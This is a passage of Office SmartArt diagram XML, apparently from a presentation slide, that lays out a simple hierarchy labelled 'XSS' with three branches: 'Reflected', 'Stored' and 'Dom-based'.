    <dgm:cxn modelId="{7AB57964-B198-4561-B3FB-41417582F9AD}" srcId="{D1433D7B-7388-4C88-AECD-3DC9C4401736}" destId="{DF7E1589-FAFB-4F0E-9B4B-659156ABCD9C}" srcOrd="0" destOrd="0" parTransId="{4B6589AC-C765-4E63-9793-FF8149612CD5}" sibTransId="{960071B1-A897-4EBF-981F-31562AE2D4DA}"/>
    <dgm:cxn modelId="{141B486A-D6B0-4046-8199-1A6037C5AB33}" type="presOf" srcId="{5864449E-EDE5-494B-BF9E-24DBF1280589}" destId="{B26EF856-E590-4B9D-B74A-60A37DC10BCA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{1C5E6095-FD87-49C1-A82C-D3FCE54AEFD8}" type="presOf" srcId="{D1433D7B-7388-4C88-AECD-3DC9C4401736}" destId="{C48136C9-B32E-4E52-921F-7A779C220BD9}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{6EF890B8-DE2F-459F-97B9-568D18F00845}" type="presOf" srcId="{DF7E1589-FAFB-4F0E-9B4B-659156ABCD9C}" destId="{3F01DD4A-65B2-426B-A5EB-BD5AD2320919}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{6598F8C5-28E8-4291-B617-8B658BBD7637}" type="presOf" srcId="{F84E2699-DABD-47C9-B12F-1B437E2F5FA1}" destId="{566BE809-0ABF-4AB8-A38B-277829C1B9B0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{25A602C7-3019-43F1-AF70-8BABBA8F75EF}" type="presOf" srcId="{99569E83-AD4D-45FF-9E52-B2537107782A}" destId="{E536D3EE-DC88-4C4F-B29F-0188FAAA7812}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{4B2922CF-292D-4720-9CB8-3B22C26FA31C}" type="presOf" srcId="{F95992CA-B3DF-44EC-A684-6CDD4E45CF71}" destId="{0B4B7111-3827-4C20-8111-DF43A1C984D1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{C0EEB8E2-DF10-4EFC-A786-E0EC960062D5}" type="presOf" srcId="{99569E83-AD4D-45FF-9E52-B2537107782A}" destId="{168E814E-BFD7-4033-B860-E7472FB36FA3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{B0162FF7-2BA7-45E3-9DA3-A7204923C9CB}" srcId="{F95992CA-B3DF-44EC-A684-6CDD4E45CF71}" destId="{D1433D7B-7388-4C88-AECD-3DC9C4401736}" srcOrd="0" destOrd="0" parTransId="{019BDFFE-F8F8-410E-9011-EA727419B227}" sibTransId="{90DD54A5-F99D-4D54-A035-E9E75FDE8B75}"/>
    <dgm:cxn modelId="{14EAD4F8-DE73-4452-BA2A-C12C23F264AB}" type="presOf" srcId="{F6470A2F-1B36-41EB-B858-2600A47782F6}" destId="{F0218530-B9FC-4066-AB22-BF201C936E58}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{F8E6416A-96D3-483B-9E9C-A1C6D2C0E539}" type="presParOf" srcId="{0B4B7111-3827-4C20-8111-DF43A1C984D1}" destId="{2311097E-9541-4DD9-9C6F-1467D4A4D336}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A123F791-1916-408C-BD01-26BB5B0FD7BF}" type="presParOf" srcId="{2311097E-9541-4DD9-9C6F-1467D4A4D336}" destId="{66A43B76-41C9-4C64-B654-24B186F9CF0E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{92799D60-BFB6-4C08-8E05-55315AA83CF2}" type="presParOf" srcId="{2311097E-9541-4DD9-9C6F-1467D4A4D336}" destId="{C48136C9-B32E-4E52-921F-7A779C220BD9}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{823172D9-B5AC-4BC0-A95B-E1AF51B7AF34}" type="presParOf" srcId="{0B4B7111-3827-4C20-8111-DF43A1C984D1}" destId="{A7D765E3-B8DD-4747-B79D-3D55DDA321EA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{0BD421FC-BE5C-44F5-8EAC-99A9A8271A07}" type="presParOf" srcId="{0B4B7111-3827-4C20-8111-DF43A1C984D1}" destId="{3F01DD4A-65B2-426B-A5EB-BD5AD2320919}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{5358159B-2845-48B5-A3EE-0547F81F890D}" type="presParOf" srcId="{0B4B7111-3827-4C20-8111-DF43A1C984D1}" destId="{E3202350-DD34-4F55-85D6-66FA8C9DE5EE}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{5CB322CF-3DF0-49B2-A351-9C3C7163EF5E}" type="presParOf" srcId="{0B4B7111-3827-4C20-8111-DF43A1C984D1}" destId="{4B5B70B0-BD3B-450F-86BD-12C2BDC046A6}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{6AE92342-23A9-48D2-86CF-D7643E611BCE}" type="presParOf" srcId="{4B5B70B0-BD3B-450F-86BD-12C2BDC046A6}" destId="{566BE809-0ABF-4AB8-A38B-277829C1B9B0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{5FC2CD7D-B571-43E9-B025-01979FEBFA49}" type="presParOf" srcId="{4B5B70B0-BD3B-450F-86BD-12C2BDC046A6}" destId="{C600AF1F-E3F4-4A51-9598-948EDA7B3D53}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{E77CD7B9-A9E1-4D6B-8C14-1D7929C3F346}" type="presParOf" srcId="{0B4B7111-3827-4C20-8111-DF43A1C984D1}" destId="{19734135-C95F-44EE-8B3F-79EA0AD53E9B}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{C1B62408-AD3A-4D54-A381-828FC18D785D}" type="presParOf" srcId="{0B4B7111-3827-4C20-8111-DF43A1C984D1}" destId="{F0218530-B9FC-4066-AB22-BF201C936E58}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{C4AAA8C8-09BB-4AD8-8B1F-11EDED0C0079}" type="presParOf" srcId="{0B4B7111-3827-4C20-8111-DF43A1C984D1}" destId="{39B3ABB2-EE4F-4B1F-8766-73A9EF5B32EE}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{70A8B3BA-CB7D-410A-8DDD-AB56D40E597E}" type="presParOf" srcId="{0B4B7111-3827-4C20-8111-DF43A1C984D1}" destId="{A8000D9C-3BFB-46BB-80D6-4ABE383FB11E}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{AF939AD8-D8BA-4A9D-A6AB-7F187C661B65}" type="presParOf" srcId="{A8000D9C-3BFB-46BB-80D6-4ABE383FB11E}" destId="{E536D3EE-DC88-4C4F-B29F-0188FAAA7812}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{6A25DFE3-DC4B-410E-9F39-87E1454D7830}" type="presParOf" srcId="{A8000D9C-3BFB-46BB-80D6-4ABE383FB11E}" destId="{168E814E-BFD7-4033-B860-E7472FB36FA3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{DCA2F51A-3B73-4444-9CE5-06625EBFEF6E}" type="presParOf" srcId="{0B4B7111-3827-4C20-8111-DF43A1C984D1}" destId="{5CE988F7-D78A-4EB4-AEB7-D63AD61F89D8}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{FA19B5CA-04BF-4ED7-A1CA-FC4C6D02ABEB}" type="presParOf" srcId="{0B4B7111-3827-4C20-8111-DF43A1C984D1}" destId="{B26EF856-E590-4B9D-B74A-60A37DC10B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967311-6D61-419F-9D1E-2FD24BA970D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A967E33-D1B5-40E1-82CA-F63E104735F1}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0"/>
            <a:t>XSS</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{236D3005-FFD4-4A93-B2D8-3C5EBE1215C1}" type="parTrans" cxnId="{42F1B6F9-5250-4E16-A690-35355580B073}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{868D5A9C-7157-4C49-9DBA-5783E98738B9}" type="sibTrans" cxnId="{42F1B6F9-5250-4E16-A690-35355580B073}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C409427F-3D2D-45C1-984C-D5A48177A1BE}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0"/>
            <a:t>Reflected</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{960580DD-E68D-4136-A8D7-33F604C7C107}" type="sibTrans" cxnId="{8466B441-0319-4C5E-9209-915D7A4788D2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{72054474-C049-487D-AEE2-C163A071DF92}" type="parTrans" cxnId="{8466B441-0319-4C5E-9209-915D7A4788D2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6371E9DA-FB0B-4721-A273-13440CE6AA18}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
            <a:t>Stored</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2DD7E52A-DAE4-4679-BFE8-C72CE5091204}" type="sibTrans" cxnId="{FCE41792-7E4D-4C9A-A0D5-FDED35E7BBF7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{84F80D6F-44F9-4143-AF83-8BFB13F0A8BA}" type="parTrans" cxnId="{FCE41792-7E4D-4C9A-A0D5-FDED35E7BBF7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{371B02C2-F95B-44A8-BAA0-5568C052449B}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
            <a:t>Dom-based</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9EE820CD-F6AF-4FD9-A491-35E29AB264DA}" type="parTrans" cxnId="{CE22CBEA-EBFB-498C-8919-8BE67DBBFD90}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{13321D8D-5EE7-4715-AB41-B0A24FFB7390}" type="sibTrans" cxnId="{CE22CBEA-EBFB-498C-8919-8BE67DBBFD90}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{85B70814-7119-454E-8F90-AEEF0B103084}" type="pres">
      <dgm:prSet presAssocID="{B9967311-6D61-419F-9D1E-2FD24BA970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50F526-10E4-494B-A923-BAB8535F6A2F}" type="pres">
      <dgm:prSet presAssocID="{1A967E33-D1B5-40E1-82CA-F63E104735F1}" presName="root1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4F2EE09D-CF03-49D3-9A80-9E0807295655}" type="pres">
      <dgm:prSet presAssocID="{1A967E33-D1B5-40E1-82CA-F63E104735F1}" presName="LevelOneTextNode" presStyleLbl="node0" presStyleIdx="0" presStyleCnt="1">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{126A8BE2-AF9F-42AC-AD3E-B77EC2EF8229}" type="pres">
      <dgm:prSet presAssocID="{1A967E33-D1B5-40E1-82CA-F63E104735F1}" presName="level2hierChild" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DC000199-A63A-4F6D-B581-DB2D573A58A1}" type="pres">
      <dgm:prSet presAssocID="{72054474-C049-487D-AEE2-C163A071DF92}" presName="conn2-1" presStyleLbl="parChTrans1D2" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EA93596E-FEC6-4038-888C-66088660B02D}" type="pres">
      <dgm:prSet presAssocID="{72054474-C049-487D-AEE2-C163A071DF92}" presName="connTx" presStyleLbl="parChTrans1D2" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B9B5E978-E890-4B72-B2AC-D55F77F6B37C}" type="pres">
      <dgm:prSet presAssocID="{C409427F-3D2D-45C1-984C-D5A48177A1BE}" presName="root2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{50209067-CD63-48B2-8845-7E70BB001747}" type="pres">
      <dgm:prSet presAssocID="{C409427F-3D2D-45C1-984C-D5A48177A1BE}" presName="LevelTwoTextNode" presStyleLbl="node2" presStyleIdx="0" presStyleCnt="3" custScaleY="124496" custLinFactNeighborX="41" custLinFactNeighborY="-59599">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C1ACF7FA-1521-4D30-97B5-B7C1CD200361}" type="pres">
      <dgm:prSet presAssocID="{C409427F-3D2D-45C1-984C-D5A48177A1BE}" presName="level3hierChild" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{515476AD-CB98-4717-A892-CE1AE84F5D72}" type="pres">
      <dgm:prSet presAssocID="{84F80D6F-44F9-4143-AF83-8BFB13F0A8BA}" presName="conn2-1" presStyleLbl="parChTrans1D2" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F068C259-059C-4CC5-8652-F5B665FB5718}" type="pres">
      <dgm:prSet presAssocID="{84F80D6F-44F9-4143-AF83-8BFB13F0A8BA}" presName="connTx" presStyleLbl="parChTrans1D2" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7C1831AE-A1F9-4373-ADF9-5040E6F0E8FE}" type="pres">
      <dgm:prSet presAssocID="{6371E9DA-FB0B-4721-A273-13440CE6AA18}" presName="root2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{943F440C-FD04-493E-8B4E-11F22D5A36E2}" type="pres">
      <dgm:prSet presAssocID="{6371E9DA-FB0B-4721-A273-13440CE6AA18}" presName="LevelTwoTextNode" presStyleLbl="node2" presStyleIdx="1" presStyleCnt="3" custLinFactNeighborX="85" custLinFactNeighborY="-16817">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{17AD3371-AA6D-49CA-88A1-4646099CC444}" type="pres">
      <dgm:prSet presAssocID="{6371E9DA-FB0B-4721-A273-13440CE6AA18}" presName="level3hierChild" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A3424FEE-6A33-4D80-B236-41B595EF87EB}" type="pres">
      <dgm:prSet presAssocID="{9EE820CD-F6AF-4FD9-A491-35E29AB264DA}" presName="conn2-1" presStyleLbl="parChTrans1D2" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A6AC1673-F3EA-427B-BF28-953C6AC27FB3}" type="pres">
      <dgm:prSet presAssocID="{9EE820CD-F6AF-4FD9-A491-35E29AB264DA}" presName="connTx" presStyleLbl="parChTrans1D2" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DB861491-C94B-446F-BC15-56448202030E}" type="pres">
      <dgm:prSet presAssocID="{371B02C2-F95B-44A8-BAA0-5568C052449B}" presName="root2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{93B7F0A3-5CF4-44F3-A202-61506D047FF5}" type="pres">
      <dgm:prSet presAssocID="{371B02C2-F95B-44A8-BAA0-5568C052449B}" presName="LevelTwoTextNode" presStyleLbl="node2" presStyleIdx="2" presStyleCnt="3" custLinFactNeighborX="1115" custLinFactNeighborY="34048">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7AF8CB9C-6D76-47ED-9ADE-249E64786824}" type="pres">
      <dgm:prSet presAssocID="{371B02C2-F95B-44A8-BAA0-5568C052449B}" presName="level3hierChild" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{C60F6C06-98A1-4319-9DFA-8FBA173CB224}" type="presOf" srcId="{1A967E33-D1B5-40E1-82CA-F63E104735F1}" destId="{4F2EE09D-CF03-49D3-9A80-9E0807295655}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{B249AD07-BC78-4524-AD1D-096AFE7FC10C}" type="presOf" srcId="{72054474-C049-487D-AEE2-C163A071DF92}" destId="{DC000199-A63A-4F6D-B581-DB2D573A58A1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{7781422A-40D8-4EE0-8CCE-02F8A19154A5}" type="presOf" srcId="{371B02C2-F95B-44A8-BAA0-5568C052449B}" destId="{93B7F0A3-5CF4-44F3-A202-61506D047FF5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{488F3A3A-9686-4480-A904-842B99F3F49E}" type="presOf" srcId="{B9967311-6D61-419F-9D1E-2FD24BA970DC}" destId="{85B70814-7119-454E-8F90-AEEF0B103084}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{8466B441-0319-4C5E-9209-915D7A4788D2}" srcId="{1A967E33-D1B5-40E1-82CA-F63E104735F1}" destId="{C409427F-3D2D-45C1-984C-D5A48177A1BE}" srcOrd="0" destOrd="0" parTransId="{72054474-C049-487D-AEE2-C163A071DF92}" sibTransId="{960580DD-E68D-4136-A8D7-33F604C7C107}"/>
    <dgm:cxn modelId="{FCE41792-7E4D-4C9A-A0D5-FDED35E7BBF7}" srcId="{1A967E33-D1B5-40E1-82CA-F63E104735F1}" destId="{6371E9DA-FB0B-4721-A273-13440CE6AA18}" srcOrd="1" destOrd="0" parTransId="{84F80D6F-44F9-4143-AF83-8BFB13F0A8BA}" sibTransId="{2DD7E52A-DAE4-4679-BFE8-C72CE5091204}"/>
    <dgm:cxn modelId="{9CC7E0C7-B52F-4D33-9F92-133E67B5EEEC}" type="presOf" srcId="{72054474-C049-487D-AEE2-C163A071DF92}" destId="{EA93596E-FEC6-4038-888C-66088660B02D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{225182DA-13C7-4D13-99B7-534049762754}" type="presOf" srcId="{9EE820CD-F6AF-4FD9-A491-35E29AB264DA}" destId="{A6AC1673-F3EA-427B-BF28-953C6AC27FB3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{CE22CBEA-EBFB-498C-8919-8BE67DBBFD90}" srcId="{1A967E33-D1B5-40E1-82CA-F63E104735F1}" destId="{371B02C2-F95B-44A8-BAA0-5568C052449B}" srcOrd="2" destOrd="0" parTransId="{9EE820CD-F6AF-4FD9-A491-35E29AB264DA}" sibTransId="{13321D8D-5EE7-4715-AB41-B0A24FFB7390}"/>
    <dgm:cxn modelId="{94F469EC-824F-4F74-80C5-9FFE9AE9BA60}" type="presOf" srcId="{84F80D6F-44F9-4143-AF83-8BFB13F0A8BA}" destId="{F068C259-059C-4CC5-8652-F5B665FB5718}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{B16556EF-8B44-4234-A587-43FDD2CA0F5F}" type="presOf" srcId="{C409427F-3D2D-45C1-984C-D5A48177A1BE}" destId="{50209067-CD63-48B2-8845-7E70BB001747}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{38BA21F0-0FF7-4FDA-8244-5F5E99092273}" type="presOf" srcId="{84F80D6F-44F9-4143-AF83-8BFB13F0A8BA}" destId="{515476AD-CB98-4717-A892-CE1AE84F5D72}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{5B7145F4-DDFB-4B1E-8F30-AEB266C2140B}" type="presOf" srcId="{6371E9DA-FB0B-4721-A273-13440CE6AA18}" destId="{943F440C-FD04-493E-8B4E-11F22D5A36E2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{E7D88AF4-4C85-448E-BFEF-75C11569F94D}" type="presOf" srcId="{9EE820CD-F6AF-4FD9-A491-35E29AB264DA}" destId="{A3424FEE-6A33-4D80-B236-41B595EF87EB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{42F1B6F9-5250-4E16-A690-35355580B073}" srcId="{B9967311-6D61-419F-9D1E-2FD24BA970DC}" destId="{1A967E33-D1B5-40E1-82CA-F63E104735F1}" srcOrd="0" destOrd="0" parTransId="{236D3005-FFD4-4A93-B2D8-3C5EBE1215C1}" sibTransId="{868D5A9C-7157-4C49-9DBA-5783E98738B9}"/>
    <dgm:cxn modelId="{9C6A7571-D961-446F-B5F0-F6DC6CE1660E}" type="presParOf" srcId="{85B70814-7119-454E-8F90-AEEF0B103084}" destId="{C150F526-10E4-494B-A923-BAB8535F6A2F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{8ADF6251-F9D6-48A4-838A-DA891768CC44}" type="presParOf" srcId="{C150F526-10E4-494B-A923-BAB8535F6A2F}" destId="{4F2EE09D-CF03-49D3-9A80-9E0807295655}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{56DA2390-2A52-468F-89AE-6832565AACD1}" type="presParOf" srcId="{C150F526-10E4-494B-A923-BAB8535F6A2F}" destId="{126A8BE2-AF9F-42AC-AD3E-B77EC2EF8229}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{B0DDA757-4714-4ACF-BC76-66E8D0F848BC}" type="presParOf" srcId="{126A8BE2-AF9F-42AC-AD3E-B77EC2EF8229}" destId="{DC000199-A63A-4F6D-B581-DB2D573A58A1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{62ACC43D-4D66-4B90-A031-C0FA7B543ED2}" type="presParOf" srcId="{DC000199-A63A-4F6D-B581-DB2D573A58A1}" destId="{EA93596E-FEC6-4038-888C-66088660B02D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{C69B389A-D027-4B18-B9D0-BA86CC99F98F}" type="presParOf" srcId="{126A8BE2-AF9F-42AC-AD3E-B77EC2EF8229}" destId="{B9B5E978-E890-4B72-B2AC-D55F77F6B37C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{6612910F-9FE7-4FB0-8F1A-73C61255F76D}" type="presParOf" srcId="{B9B5E978-E890-4B72-B2AC-D55F77F6B37C}" destId="{50209067-CD63-48B2-8845-7E70BB001747}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{23848E1E-0979-4F0C-8826-458B872EDC50}" type="presParOf" srcId="{B9B5E978-E890-4B72-B2AC-D55F77F6B37C}" destId="{C1ACF7FA-1521-4D30-97B5-B7C1CD200361}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{B6BB4C55-ED6F-4C2F-962E-CEF27E3629B0}" type="presParOf" srcId="{126A8BE2-AF9F-42AC-AD3E-B77EC2EF8229}" destId="{515476AD-CB98-4717-A892-CE1AE84F5D72}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{DE69D185-8F6E-4B55-909E-9ADAA36FB3E8}" type="presParOf" srcId="{515476AD-CB98-4717-A892-CE1AE84F5D72}" destId="{F068C259-059C-4CC5-8652-F5B665FB5718}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{CFD4B72C-0C5F-4F92-AB9C-8BBA2EA7F07C}" type="presParOf" srcId="{126A8BE2-AF9F-42AC-AD3E-B77EC2EF8229}" destId="{7C1831AE-A1F9-4373-ADF9-5040E6F0E8FE}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{1C2E27ED-3C37-431C-AA51-9A484E3ED265}" type="presParOf" srcId="{7C1831AE-A1F9-4373-ADF9-5040E6F0E8FE}" destId="{943F440C-FD04-493E-8B4E-11F22D5A36E2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{26DAF7A5-A326-4F4C-B655-165A1496E014}" type="presParOf" srcId="{7C1831AE-A1F9-4373-ADF9-5040E6F0E8FE}" destId="{17AD3371-AA6D-49CA-88A1-4646099CC444}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{ACBF2B41-36B4-4807-B231-3BDDD6FD7D7B}" type="presParOf" srcId="{126A8BE2-AF9F-42AC-AD3E-B77EC2EF8229}" destId="{A3424FEE-6A33-4D80-B236-41B595EF87EB}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
